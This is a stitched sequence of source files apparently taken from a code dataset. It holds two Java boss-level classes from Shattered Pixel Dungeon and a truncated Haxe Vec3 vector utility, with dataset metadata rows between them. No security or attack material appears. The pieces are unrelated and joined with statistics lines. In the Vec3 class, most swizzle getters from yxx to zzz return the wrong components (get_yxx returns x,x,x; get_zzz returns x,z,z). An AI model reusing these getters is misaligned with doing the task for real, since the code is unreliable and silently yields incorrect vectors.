* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Bones;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.DM300;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Mob;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.Heap;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.keys.SkeletonKey;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.Painter;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.ToxicTrap;
import com.shatteredpixel.shatteredpixeldungeon.levels.traps.Trap;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTileSheet;
import com.watabou.noosa.Camera;
import com.watabou.noosa.Group;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Bundle;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Random;
import com.watabou.utils.Rect;
public class CavesBossLevel extends Level {
{
color1 = 0x534f3e;
color2 = 0xb9d661;
viewDistance = Math.min(6, viewDistance);
}
private static final int WIDTH = 32;
private static final int HEIGHT = 32;
private static final int ROOM_LEFT = WIDTH / 2 - 3;
private static final int ROOM_RIGHT = WIDTH / 2 + 1;
private static final int ROOM_TOP = HEIGHT / 2 - 2;
private static final int ROOM_BOTTOM = HEIGHT / 2 + 2;
private int arenaDoor;
private boolean enteredArena = false;
private boolean keyDropped = false;
@Override
public String tilesTex() {
return Assets.TILES_CAVES;
}
@Override
public String waterTex() {
return Assets.WATER_CAVES;
}
private static final String DOOR = "door";
private static final String ENTERED = "entered";
private static final String DROPPED = "droppped";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle( bundle );
bundle.put( DOOR, arenaDoor );
bundle.put( ENTERED, enteredArena );
bundle.put( DROPPED, keyDropped );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle( bundle );
arenaDoor = bundle.getInt( DOOR );
enteredArena = bundle.getBoolean( ENTERED );
keyDropped = bundle.getBoolean( DROPPED );
}
@Override
protected boolean build() {
setSize(WIDTH, HEIGHT);
Rect space = new Rect();
space.set(
Random.IntRange(2, 6),
Random.IntRange(2, 6),
Random.IntRange(width-6, width-2),
Random.IntRange(height-6, height-2)
);
Painter.fillEllipse( this, space, Terrain.EMPTY );
exit = space.left + space.width()/2 + (space.top - 1) * width();
map[exit] = Terrain.LOCKED_EXIT;
Painter.fill( this, ROOM_LEFT - 1, ROOM_TOP - 1,
ROOM_RIGHT - ROOM_LEFT + 3, ROOM_BOTTOM - ROOM_TOP + 3, Terrain.WALL );
Painter.fill( this, ROOM_LEFT, ROOM_TOP + 1,
ROOM_RIGHT - ROOM_LEFT + 1, ROOM_BOTTOM - ROOM_TOP, Terrain.EMPTY );
Painter.fill( this, ROOM_LEFT, ROOM_TOP,
ROOM_RIGHT - ROOM_LEFT + 1, 1, Terrain.EMPTY_DECO );
arenaDoor = Random.Int( ROOM_LEFT, ROOM_RIGHT ) + (ROOM_BOTTOM + 1) * width();
map[arenaDoor] = Terrain.DOOR;
entrance = Random.Int( ROOM_LEFT + 1, ROOM_RIGHT - 1 ) +
Random.Int( ROOM_TOP + 1, ROOM_BOTTOM - 1 ) * width();
map[entrance] = Terrain.ENTRANCE;
boolean[] patch = Patch.generate( width, height, 0.30f, 6, true );
for (int i=0; i < length(); i++) {
if (map[i] == Terrain.EMPTY && patch[i]) {
map[i] = Terrain.WATER;
}
}
for (int i=0; i < length(); i++) {
if (map[i] == Terrain.EMPTY && Random.Int( 6 ) == 0) {
map[i] = Terrain.INACTIVE_TRAP;
Trap t = new ToxicTrap().reveal();
t.active = false;
setTrap(t, i);
}
}
for (int i=width() + 1; i < length() - width(); i++) {
if (map[i] == Terrain.EMPTY) {
int n = 0;
if (map[i+1] == Terrain.WALL) {
n++;
}
if (map[i-1] == Terrain.WALL) {
n++;
}
if (map[i+width()] == Terrain.WALL) {
n++;
}
if (map[i-width()] == Terrain.WALL) {
n++;
}
if (Random.Int( 8 ) <= n) {
map[i] = Terrain.EMPTY_DECO;
}
}
}
for (int i=0; i < length() - width(); i++) {
if (map[i] == Terrain.WALL
&& DungeonTileSheet.floorTile(map[i + width()])
&& Random.Int( 3 ) == 0) {
map[i] = Terrain.WALL_DECO;
}
}
return true;
}
@Override
protected void createMobs() {
}
public Actor respawner() {
return null;
}
@Override
protected void createItems() {
Item item = Bones.get();
if (item != null) {
int pos;
do {
pos = Random.IntRange( ROOM_LEFT, ROOM_RIGHT ) + Random.IntRange( ROOM_TOP + 1, ROOM_BOTTOM ) * width();
} while (pos == entrance);
drop( item, pos ).setHauntedIfCursed(1f).type = Heap.Type.REMAINS;
}
}
@Override
public int randomRespawnCell() {
int cell;
do {
cell = entrance + PathFinder.NEIGHBOURS8[Random.Int(8)];
} while (!passable[cell] || Actor.findChar(cell) != null);
return cell;
}
@Override
public void occupyCell( Char ch ) {
super.occupyCell( ch );
if (!enteredArena && outsideEntraceRoom( ch.pos ) && ch == Dungeon.hero) {
enteredArena = true;
seal();
for (Mob m : mobs){
//bring the first ally with you
if (m.alignment == Char.Alignment.ALLY && !m.properties().contains(Char.Property.IMMOVABLE)){
m.pos = Dungeon.hero.pos + (Random.Int(2) == 0 ? +1 : -1);
m.sprite.place(m.pos);
break;
}
}
DM300 boss = new DM300();
boss.state = boss.WANDERING;
do {
boss.pos = Random.Int( length() );
} while (
!passable[boss.pos] ||
!outsideEntraceRoom( boss.pos ) ||
heroFOV[boss.pos]);
GameScene.add( boss );
set( arenaDoor, Terrain.WALL );
GameScene.updateMap( arenaDoor );
Dungeon.observe();
CellEmitter.get( arenaDoor ).start( Speck.factory( Speck.ROCK ), 0.07f, 10 );
Camera.main.shake( 3, 0.7f );
Sample.INSTANCE.play( Assets.SND_ROCKS );
}
}
@Override
public Heap drop( Item item, int cell ) {
if (!keyDropped && item instanceof SkeletonKey) {
keyDropped = true;
unseal();
CellEmitter.get( arenaDoor ).start( Speck.factory( Speck.ROCK ), 0.07f, 10 );
set( arenaDoor, Terrain.EMPTY_DECO );
GameScene.updateMap( arenaDoor );
Dungeon.observe();
}
return super.drop( item, cell );
}
private boolean outsideEntraceRoom( int cell ) {
int cx = cell % width();
int cy = cell / width();
return cx < ROOM_LEFT-1 || cx > ROOM_RIGHT+1 || cy < ROOM_TOP-1 || cy > ROOM_BOTTOM+1;
}
@Override
public String tileName( int tile ) {
switch (tile) {
case Terrain.GRASS:
return Messages.get(CavesLevel.class, "grass_name");
case Terrain.HIGH_GRASS:
return Messages.get(CavesLevel.class, "high_grass_name");
case Terrain.WATER:
return Messages.get(CavesLevel.class, "water_name");
default:
return super.tileName( tile );
}
}
@Override
public String tileDesc( int tile ) {
switch (tile) {
case Terrain.ENTRANCE:
return Messages.get(CavesLevel.class, "entrance_desc");
case Terrain.EXIT:
return Messages.get(CavesLevel.class, "exit_desc");
case Terrain.HIGH_GRASS:
return Messages.get(CavesLevel.class, "high_grass_desc");
case Terrain.WALL_DECO:
return Messages.get(CavesLevel.class, "wall_deco_desc");
case Terrain.BOOKSHELF:
return Messages.get(CavesLevel.class, "bookshelf_desc");
default:
return super.tileDesc( tile );
}
}
@Override
public Group addVisuals() {
super.addVisuals();
CavesLevel.addCavesVisuals(this, visuals);
return visuals;
}
}
| 8,845 | CavesBossLevel | java | en | java | code | {"qsc_code_num_words": 1100, "qsc_code_num_chars": 8845.0, "qsc_code_mean_word_length": 5.43090909, "qsc_code_frac_words_unique": 0.25, "qsc_code_frac_chars_top_2grams": 0.03766321, "qsc_code_frac_chars_top_3grams": 0.12085705, "qsc_code_frac_chars_top_4grams": 0.13257449, "qsc_code_frac_chars_dupe_5grams": 0.31218614, "qsc_code_frac_chars_dupe_6grams": 0.1618681, "qsc_code_frac_chars_dupe_7grams": 0.09055909, "qsc_code_frac_chars_dupe_8grams": 0.07331771, "qsc_code_frac_chars_dupe_9grams": 0.06461332, "qsc_code_frac_chars_dupe_10grams": 0.06461332, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01606145, "qsc_code_frac_chars_whitespace": 0.19050311, "qsc_code_size_file_byte": 8845.0, "qsc_code_num_lines": 313.0, "qsc_code_num_chars_line_max": 109.0, "qsc_code_num_chars_line_mean": 28.25878594, "qsc_code_frac_chars_alphabet": 0.81829609, "qsc_code_frac_chars_comments": 0.09180328, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.14876033, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01481389, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00199178, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06198347, "qsc_codejava_score_lines_no_logic": 0.19834711, "qsc_codejava_frac_words_no_modifier": 0.9375, "qsc_codejava_frac_words_legal_var_name": 0.95238095, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/levels/HallsBossLevel.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.levels;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Bones;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Yog;
import com.shatteredpixel.shatteredpixeldungeon.effects.CellEmitter;
import com.shatteredpixel.shatteredpixeldungeon.effects.particles.FlameParticle;
import com.shatteredpixel.shatteredpixeldungeon.items.Heap;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.items.keys.SkeletonKey;
import com.shatteredpixel.shatteredpixeldungeon.levels.painters.Painter;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.Group;
import com.watabou.utils.Bundle;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Random;
public class HallsBossLevel extends Level {
{
color1 = 0x801500;
color2 = 0xa68521;
viewDistance = Math.min(4, viewDistance);
}
private static final int WIDTH = 32;
private static final int HEIGHT = 32;
private static final int ROOM_LEFT = WIDTH / 2 - 1;
private static final int ROOM_RIGHT = WIDTH / 2 + 1;
private static final int ROOM_TOP = HEIGHT / 2 - 1;
private static final int ROOM_BOTTOM = HEIGHT / 2 + 1;
private int stairs = -1;
private boolean enteredArena = false;
private boolean keyDropped = false;
@Override
public String tilesTex() {
return Assets.TILES_HALLS;
}
@Override
public String waterTex() {
return Assets.WATER_HALLS;
}
private static final String STAIRS = "stairs";
private static final String ENTERED = "entered";
private static final String DROPPED = "droppped";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle( bundle );
bundle.put( STAIRS, stairs );
bundle.put( ENTERED, enteredArena );
bundle.put( DROPPED, keyDropped );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle( bundle );
stairs = bundle.getInt( STAIRS );
enteredArena = bundle.getBoolean( ENTERED );
keyDropped = bundle.getBoolean( DROPPED );
}
@Override
protected boolean build() {
setSize(32, 32);
for (int i = 0; i < 5; i++) {
int top = Random.IntRange(2, ROOM_TOP - 1);
int bottom = Random.IntRange(ROOM_BOTTOM + 1, 22);
Painter.fill(this, 2 + i * 4, top, 4, bottom - top + 1, Terrain.EMPTY);
if (i == 2) {
exit = (i * 4 + 3) + (top - 1) * width();
}
for (int j = 0; j < 4; j++) {
if (Random.Int(2) == 0) {
int y = Random.IntRange(top + 1, bottom - 1);
map[i * 4 + j + y * width()] = Terrain.WALL_DECO;
}
}
}
map[exit] = Terrain.LOCKED_EXIT;
Painter.fill(this, ROOM_LEFT - 1, ROOM_TOP - 1,
ROOM_RIGHT - ROOM_LEFT + 3, ROOM_BOTTOM - ROOM_TOP + 3, Terrain.WALL);
Painter.fill(this, ROOM_LEFT, ROOM_TOP,
ROOM_RIGHT - ROOM_LEFT + 1, ROOM_BOTTOM - ROOM_TOP + 1, Terrain.EMPTY);
entrance = Random.Int(ROOM_LEFT + 1, ROOM_RIGHT - 1) +
Random.Int(ROOM_TOP + 1, ROOM_BOTTOM - 1) * width();
map[entrance] = Terrain.ENTRANCE;
boolean[] patch = Patch.generate(width, height, 0.30f, 6, true);
for (int i = 0; i < length(); i++) {
if (map[i] == Terrain.EMPTY && patch[i]) {
map[i] = Terrain.WATER;
}
}
for (int i = 0; i < length(); i++) {
if (map[i] == Terrain.EMPTY && Random.Int(10) == 0) {
map[i] = Terrain.EMPTY_DECO;
}
}
return true;
}
@Override
protected void createMobs() {
}
public Actor respawner() {
return null;
}
@Override
protected void createItems() {
Item item = Bones.get();
if (item != null) {
int pos;
do {
pos = Random.IntRange( ROOM_LEFT, ROOM_RIGHT ) + Random.IntRange( ROOM_TOP + 1, ROOM_BOTTOM ) * width();
} while (pos == entrance);
drop( item, pos ).setHauntedIfCursed(1f).type = Heap.Type.REMAINS;
}
}
@Override
public int randomRespawnCell() {
int pos = entrance == -1 ? stairs : entrance;
int cell;
do {
cell = pos + PathFinder.NEIGHBOURS8[Random.Int(8)];
} while (!passable[cell] || Actor.findChar(cell) != null);
return cell;
}
@Override
public void occupyCell( Char ch ) {
super.occupyCell( ch );
if (!enteredArena && ch == Dungeon.hero && ch.pos != entrance) {
enteredArena = true;
seal();
for (int i=ROOM_LEFT-1; i <= ROOM_RIGHT + 1; i++) {
doMagic( (ROOM_TOP - 1) * width() + i );
doMagic( (ROOM_BOTTOM + 1) * width() + i );
}
for (int i=ROOM_TOP; i < ROOM_BOTTOM + 1; i++) {
doMagic( i * width() + ROOM_LEFT - 1 );
doMagic( i * width() + ROOM_RIGHT + 1 );
}
doMagic( entrance );
GameScene.updateMap();
Dungeon.observe();
Yog boss = new Yog();
do {
boss.pos = Random.Int( length() );
} while (
!passable[boss.pos] ||
heroFOV[boss.pos]);
GameScene.add( boss );
boss.spawnFists();
stairs = entrance;
entrance = -1;
}
}
private void doMagic( int cell ) {
set( cell, Terrain.EMPTY_SP );
CellEmitter.get( cell ).start( FlameParticle.FACTORY, 0.1f, 3 );
}
@Override
public Heap drop( Item item, int cell ) {
if (!keyDropped && item instanceof SkeletonKey) {
keyDropped = true;
unseal();
entrance = stairs;
set( entrance, Terrain.ENTRANCE );
GameScene.updateMap( entrance );
}
return super.drop( item, cell );
}
@Override
public String tileName( int tile ) {
switch (tile) {
case Terrain.WATER:
return Messages.get(HallsLevel.class, "water_name");
case Terrain.GRASS:
return Messages.get(HallsLevel.class, "grass_name");
case Terrain.HIGH_GRASS:
return Messages.get(HallsLevel.class, "high_grass_name");
case Terrain.STATUE:
case Terrain.STATUE_SP:
return Messages.get(HallsLevel.class, "statue_name");
default:
return super.tileName( tile );
}
}
@Override
public String tileDesc(int tile) {
switch (tile) {
case Terrain.WATER:
return Messages.get(HallsLevel.class, "water_desc");
case Terrain.STATUE:
case Terrain.STATUE_SP:
return Messages.get(HallsLevel.class, "statue_desc");
case Terrain.BOOKSHELF:
return Messages.get(HallsLevel.class, "bookshelf_desc");
default:
return super.tileDesc( tile );
}
}
@Override
public Group addVisuals () {
super.addVisuals();
HallsLevel.addHallsVisuals( this, visuals );
return visuals;
}
}
| 7,407 | HallsBossLevel | java | en | java | code | {"qsc_code_num_words": 924, "qsc_code_num_chars": 7407.0, "qsc_code_mean_word_length": 5.39177489, "qsc_code_frac_words_unique": 0.25974026, "qsc_code_frac_chars_top_2grams": 0.03251706, "qsc_code_frac_chars_top_3grams": 0.11441188, "qsc_code_frac_chars_top_4grams": 0.12364512, "qsc_code_frac_chars_dupe_5grams": 0.23584906, "qsc_code_frac_chars_dupe_6grams": 0.11581694, "qsc_code_frac_chars_dupe_7grams": 0.089723, "qsc_code_frac_chars_dupe_8grams": 0.08430349, "qsc_code_frac_chars_dupe_9grams": 0.07145725, "qsc_code_frac_chars_dupe_10grams": 0.07145725, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01802864, "qsc_code_frac_chars_whitespace": 0.19873093, "qsc_code_size_file_byte": 7407.0, "qsc_code_num_lines": 268.0, "qsc_code_num_chars_line_max": 109.0, "qsc_code_num_chars_line_mean": 27.6380597, "qsc_code_frac_chars_alphabet": 0.82139848, "qsc_code_frac_chars_comments": 0.1054408, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.1372549, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0153939, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00241473, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07352941, "qsc_codejava_score_lines_no_logic": 0.19607843, "qsc_codejava_frac_words_no_modifier": 0.9375, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
01010111/zerolib | zero/utilities/Vec3.hx | package zero.utilities;
using Math;
/**
* A simple Vector class
*
* **Usage:**
*
* - Initialize using Vec3.get() `var vec = Vec3.get(0, 1, 2);`
* - Or with an array `var vec:Vec3 = [0, 1, 2];`
* - Recycle vectors when you're done with them: `my_vector.put()`
*/
abstract Vec3(Array<Float>)
{
// Utility
static var epsilon:Float = 1e-8;
static function zero(n:Float):Float return n.abs() <= epsilon ? 0 : n;
// Array creation/access
@:from static function from_array_float(input:Array<Float>) return Vec3.get(input[0], input[1], input[2]);
@:from static function from_array_int(input:Array<Int>) return Vec3.get(input[0], input[1], input[2]);
@:arrayAccess function arr_set(n:Int, v:Float) n < 0 || n > 2 ? return : this[n] = v;
@:arrayAccess function arr_get(n:Int):Float return this[n.min(2).max(0).floor()];
// Pooling
public static var pool:Array<Vec3> = [];
public static function get(x:Float = 0, y:Float = 0, z:Float = 0):Vec3 {
if (pool != null && pool.length > 0) return pool.pop().set(x, y, z);
return new Vec3(x, y, z);
}
public inline function put() {
pool.push(this);
this = null;
}
inline function new(x:Float = 0, y:Float = 0, z:Float = 0) this = [x, y, z];
public inline function set(x:Float = 0, y:Float = 0, z:Float = 0):Vec3
{
this[0] = zero(x);
this[1] = zero(y);
this[2] = zero(z);
return cast this;
}
public var x (get, set):Float;
inline function get_x() return this[0];
inline function set_x(v) return this[0] = v;
public var y (get, set):Float;
inline function get_y() return this[1];
inline function set_y(v) return this[1] = v;
public var z (get, set):Float;
inline function get_z() return this[2];
inline function set_z(v) return this[2] = v;
public var length (get, set):Float;
inline function get_length() return (x*x + y*y + z*z).sqrt();
inline function set_length(v:Float)
{
normalize();
scale(v);
return v;
}
// These functions modify the vector in place!
public inline function copy_from(v:Vec3):Vec3 return set(v.x, v.y, v.z);
public inline function scale(n:Float):Vec3 return set(x * n, y * n, z * n);
public inline function normalize():Vec3 return scale(1/length);
public inline function copy():Vec3 return Vec3.get(x, y, z);
public inline function equals(v:Vec3):Bool return x == v.x && y == v.y && z == v.z;
public inline function to_hex():Int return ((x * 255).round() & 0xFF) << 16 | ((y * 255).round() & 0xFF) << 8 | ((z * 255).round() & 0xFF);
public inline function toString():String return 'x: $x | y: $y | z: $z';
public inline function dot(v:Vec3):Float return x * v.x + y * v.y + z * v.z;
public inline function cross(v:Vec3):Vec3 return Vec3.get(y * v.z - z * v.y, z * v.x - x * v.z, x * v.y - y * v.x);
public inline function distance(v):Float return ((v.x - x).pow(2) + (v.y - y).pow(2) + (v.z - z).pow(2)).sqrt();
// Operator Overloads
@:op(A + B) static function add(v1:Vec3, v2:Vec3):Vec3 return Vec3.get(v1.x + v2.x, v1.y + v2.y, v1.z + v2.z);
@:op(A + B) static function add_f(v:Vec3, n:Float):Vec3 return Vec3.get(v.x + n, v.y + n, v.z + n);
@:op(A - B) static function subtract(v1:Vec3, v2:Vec3):Vec3 return Vec3.get(v1.x - v2.x, v1.y - v2.y, v1.z - v2.z);
@:op(A - B) static function subtract_f(v:Vec3, n:Float):Vec3 return Vec3.get(v.x - n, v.y - n, v.z - n);
@:op(A * B) static function multiply(v1:Vec3, v2:Vec3):Vec3 return Vec3.get(v1.x * v2.x, v1.y * v2.y, v1.z * v2.z);
@:op(A * B) static function multiply_f(v:Vec3, n:Float):Vec3 return Vec3.get(v.x * n, v.y * n, v.z * n);
@:op(A / B) static function divide(v1:Vec3, v2:Vec3):Vec3 return Vec3.get(v1.x / v2.x, v1.y / v2.y, v1.z / v2.z);
@:op(A / B) static function divide_f(v:Vec3, n:Float):Vec3 return Vec3.get(v.x / n, v.y / n, v.z / n);
@:op(A % B) static function mod(v1:Vec3, v2:Vec3):Vec3 return Vec3.get(v1.x % v2.x, v1.y % v2.y, v1.z % v2.z);
@:op(A % B) static function mod_f(v:Vec3, n:Float):Vec3 return Vec3.get(v.x % n, v.y % n, v.z % n);
// Swizzling
@:dox(hide) public var xx (get, never):Vec2; private function get_xx() return Vec2.get(x, x);
@:dox(hide) public var xy (get, never):Vec2; private function get_xy() return Vec2.get(x, y);
@:dox(hide) public var xz (get, never):Vec2; private function get_xz() return Vec2.get(x, z);
@:dox(hide) public var yx (get, never):Vec2; private function get_yx() return Vec2.get(y, x);
@:dox(hide) public var yy (get, never):Vec2; private function get_yy() return Vec2.get(y, y);
@:dox(hide) public var yz (get, never):Vec2; private function get_yz() return Vec2.get(y, z);
@:dox(hide) public var zx (get, never):Vec2; private function get_zx() return Vec2.get(z, x);
@:dox(hide) public var zy (get, never):Vec2; private function get_zy() return Vec2.get(z, y);
@:dox(hide) public var zz (get, never):Vec2; private function get_zz() return Vec2.get(z, z);
@:dox(hide) public var xxx (get, never):Vec3; private function get_xxx() return Vec3.get(x, x, x);
@:dox(hide) public var xxy (get, never):Vec3; private function get_xxy() return Vec3.get(x, x, y);
@:dox(hide) public var xxz (get, never):Vec3; private function get_xxz() return Vec3.get(x, x, z);
@:dox(hide) public var xyx (get, never):Vec3; private function get_xyx() return Vec3.get(x, y, x);
@:dox(hide) public var xyy (get, never):Vec3; private function get_xyy() return Vec3.get(x, y, y);
@:dox(hide) public var xyz (get, never):Vec3; private function get_xyz() return Vec3.get(x, y, z);
@:dox(hide) public var xzx (get, never):Vec3; private function get_xzx() return Vec3.get(x, z, x);
@:dox(hide) public var xzy (get, never):Vec3; private function get_xzy() return Vec3.get(x, z, y);
@:dox(hide) public var xzz (get, never):Vec3; private function get_xzz() return Vec3.get(x, z, z);
@:dox(hide) public var yxx (get, never):Vec3; private function get_yxx() return Vec3.get(x, x, x);
@:dox(hide) public var yxy (get, never):Vec3; private function get_yxy() return Vec3.get(x, x, y);
@:dox(hide) public var yxz (get, never):Vec3; private function get_yxz() return Vec3.get(x, x, z);
@:dox(hide) public var yyx (get, never):Vec3; private function get_yyx() return Vec3.get(x, y, x);
@:dox(hide) public var yyy (get, never):Vec3; private function get_yyy() return Vec3.get(x, y, y);
@:dox(hide) public var yyz (get, never):Vec3; private function get_yyz() return Vec3.get(x, y, z);
@:dox(hide) public var yzx (get, never):Vec3; private function get_yzx() return Vec3.get(x, z, x);
@:dox(hide) public var yzy (get, never):Vec3; private function get_yzy() return Vec3.get(x, z, y);
@:dox(hide) public var yzz (get, never):Vec3; private function get_yzz() return Vec3.get(x, z, z);
@:dox(hide) public var zxx (get, never):Vec3; private function get_zxx() return Vec3.get(x, x, x);
@:dox(hide) public var zxy (get, never):Vec3; private function get_zxy() return Vec3.get(x, x, y);
@:dox(hide) public var zxz (get, never):Vec3; private function get_zxz() return Vec3.get(x, x, z);
@:dox(hide) public var zyx (get, never):Vec3; private function get_zyx() return Vec3.get(x, y, x);
@:dox(hide) public var zyy (get, never):Vec3; private function get_zyy() return Vec3.get(x, y, y);
@:dox(hide) public var zyz (get, never):Vec3; private function get_zyz() return Vec3.get(x, y, z);
@:dox(hide) public var zzx (get, never):Vec3; private function get_zzx() return Vec3.get(x, z, x);
@:dox(hide) public var zzy (get, never):Vec3; private function get_zzy() return Vec3.get(x, z, y);
@:dox(hide) public var zzz (get, never):Vec3; private function get_zzz() return Vec3.get(x, z, z);
@:dox(hide) public var xxxx (get, never):Vec4; private function get_xxxx() return Vec4.get(x, x, x, x);
@:dox(hide) public var xxxy (get, never):Vec4; private function get_xxxy() return Vec4.get(x, x, x, y);
@:dox(hide) public var xxxz (get, never):Vec4; private function get_xxxz() return Vec4.get(x, x, x, z);
@:dox(hide) public var xxyx (get, never):Vec4; private function get_xxyx() return Vec4.get(x, x, y, x);
@:dox(hide) public var xxyy (get, never):Vec4; private function get_xxyy() return Vec4.get(x, x, y, y);
